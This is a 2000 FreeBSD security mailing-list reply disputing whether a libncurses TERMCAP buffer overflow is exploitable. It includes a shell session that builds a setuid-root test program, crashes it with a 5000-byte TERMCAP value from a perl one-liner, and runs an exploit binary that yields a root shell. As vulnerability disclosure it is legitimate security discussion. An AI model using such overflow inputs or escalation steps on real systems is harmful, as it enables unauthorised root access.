From owner-freebsd-security Tue Apr 25 1:51:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from lagoon.freebsd.lublin.pl (lagoon.freebsd.lublin.pl [212.182.117.180]) by hub.freebsd.org (Postfix) with SMTP id B30EB37BCC1 for ; Tue, 25 Apr 2000 01:51:40 -0700 (PDT) (envelope-from venglin@freebsd.lublin.pl) Received: (qmail 29849 invoked from network); 25 Apr 2000 08:51:45 -0000 Received: from lubi.freebsd.lublin.pl (qmailr@212.182.118.90) by lagoon.freebsd.lublin.pl with SMTP; 25 Apr 2000 08:51:45 -0000 Received: (qmail 76411 invoked by uid 0); 25 Apr 2000 08:51:37 -0000 Received: from localhost.freebsd.lublin.pl (HELO own3d) (root@127.0.0.1) by localhost.freebsd.lublin.pl with SMTP; 25 Apr 2000 08:51:37 -0000 Message-ID: <002801bfae93$5b7e69a0$0273b6d4@freebsd.lublin.pl> From: "Przemyslaw Frasunek" To: "Kris Kennaway" Cc: , References: Subject: Re: freebsd libncurses overflow Date: Tue, 25 Apr 2000 10:50:42 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Furthermore, it is not actually a vulnerability. It seems that setuid > programs will not accept an alternate termcap file via TERMCAP even under > the old version of ncurses in FreeBSD 3.x. Therefore this "exploit" can > only be used on your own binaries. Sure? lubi:venglin:~> uname -a FreeBSD lubi.freebsd.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar 1 11:18:54 CET 2000 venglin@lubi.freebsd.lublin.pl:/mnt/elite/usr/src/sys/compile/GADACZKA i386 lubi:venglin:~> cat dupa.c main() { initscr(); } lubi:venglin:~> cc -o d dupa.c -lncurses lubi:venglin:~> su s/key 76 ve15188 Password: lubi:venglin:/home/venglin# chmod 4755 d ; chown root.wheel d lubi:venglin:/home/venglin# exit lubi:venglin:~> ./d lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'` lubi:venglin:~> ./d Segmentation fault lubi:venglin:~> ./dupaexp 4000 ret: 0xbfbfba8c # id uid=0(root) gid=1001(users) groups=1001(users), 0(wheel) Obviously, *most* binaries are dropping root privileges before using any ncurses functions. -- * Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE * * Inet: venglin@freebsd.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message